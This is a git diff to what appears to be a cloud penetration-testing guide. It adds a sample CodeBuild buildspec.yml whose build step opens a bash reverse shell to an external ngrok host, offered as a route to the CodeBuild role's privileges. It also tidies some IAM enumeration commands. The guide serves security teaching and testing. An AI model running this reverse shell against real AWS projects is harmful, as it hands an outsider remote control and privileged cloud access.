diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md
index 08c08c4688..396435bc0b 100644
--- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md
@@ -274,6 +274,19 @@ aws codebuild start-build --project-name <project-name>
 # Wait for the reverse shell :)
 ```
 
+You can use something like this **builspec** to get a **reverse shell**:
+
+{% code title="buildspec.yml" %}
+```yaml
+version: 0.2
+
+phases:
+  build:
+    commands:
+      - bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18419 0>&1
+```
+{% endcode %}
+
 **Impact:** Direct privesc to the role used by the AWS CodeBuild worker that usually has high privileges.
 
 {% hint style="warning" %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md b/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md
index 17fd82d6ac..9a4621fe11 100644
--- a/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md
+++ b/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md
@@ -71,10 +71,10 @@ aws iam list-attached-group-policies --group-name <name> #Get policies of group,
 # List roles
 aws iam list-roles #Get roles
 aws iam get-role --role-name <role-name> #Get role
-
 ## inline policies
 aws iam list-role-policies --role-name <name> #Get inline policies of a role
 aws iam get-role-policy --role-name <name> --policy-name <name> #Get inline policy details
+## attached policies
 aws iam list-attached-role-policies --role-name <role-name> #Get policies of role, it doesn't get inline policies
 
 # List policies